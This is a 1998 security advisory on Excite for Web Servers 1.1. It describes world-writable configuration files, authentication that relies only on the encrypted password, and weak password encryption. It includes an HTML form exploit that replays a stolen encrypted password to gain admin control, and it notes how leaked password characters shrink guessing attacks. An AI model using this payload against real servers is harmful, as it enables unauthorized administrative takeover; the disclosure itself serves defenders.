EWS (Excite for Web Servers) 1.1 security compromises.
8 Dec. 1998
Summary
EWS (Excite for Web Servers) version 1.1, a product by Excite that allows Web administrators to add "Smart Search" capacities to their home pages, was found vulnerable to numerous security vulnerabilities.
EWS 1.1 by Excite was found to contain the following security vulnerabilities:
1) The installation program installs several files with world writeable permissions.
2) All authentication after the initial access to AT-admin.cgi relies solely on the encrypted password.
3) Passwords are not encrypted properly.
A detailed description of each of the mentioned vulnerability follows:
1) The installation program installs several files with world writeable permissions.
This is bad because one of them (Architext.conf) contains the encrypted password which is used for all authentication. Because of this, any user with shell or non anonymous FTP access to the web server could modify the encrypted password.
2) All authentication after the initial access to AT-admin.cgi relies solely on the encrypted password.
Since any user with shell or FTP access can read Architext.conf, it is trivial for local users to gain administrative privileges over EWS. Thus, a malicious user only needs to have a web page that looks like this:
<html> <head><title>exploit</title>
<body>
<p><FORM ACTION="http://EWS.SERVER.COM/cgi-bin/AT-generate.cgi" METHOD=POST>
<INPUT TYPE="hidden" NAME="db" VALUE="personal">
<INPUT TYPE="submit" NAME="Reload" VALUE="Reload">
Reload this page, in case the log file or status has changed.
<INPUT TYPE="hidden" NAME="Dump" VALUE="dummy">
<INPUT TYPE="hidden" NAME="File" VALUE="/usr/local/etc/excite/collections/AT-personal.prog">
<INPUT TYPE="hidden" NAME="Type" VALUE="progress">
<INPUT TYPE="hidden" NAME="ENCRYPTEDPASS" VALUE="ENCRYPTEDPASS">
</FORM><BR>
</body>
</html>
Of course you should replace EWS.SERVER.COM and ENCRYPTEDPASS with values that make sense for your situation, but that isn't a big problem. Now all you have to do is access this page and clicking on the button and you get to a menu that behaves exactly as if you knew the unencrypted password.
3) Passwords are not encrypted properly.
Note that the first two characters of the encrypted password are always the first two characters of the plain-text password. For example, if you choose the password "blah", the encrypted password is "blk1x.w.ISlDw".
In light of the fact that the plain-text password is not needed for adminstrative control (above), this problem is not that significant. Since this same password may be used other places it should be protected better. If a dictionary attack for the password is done, only those words that start with "bl" need be examined. If a brute force attack is used, the number of guesses goes down significantly
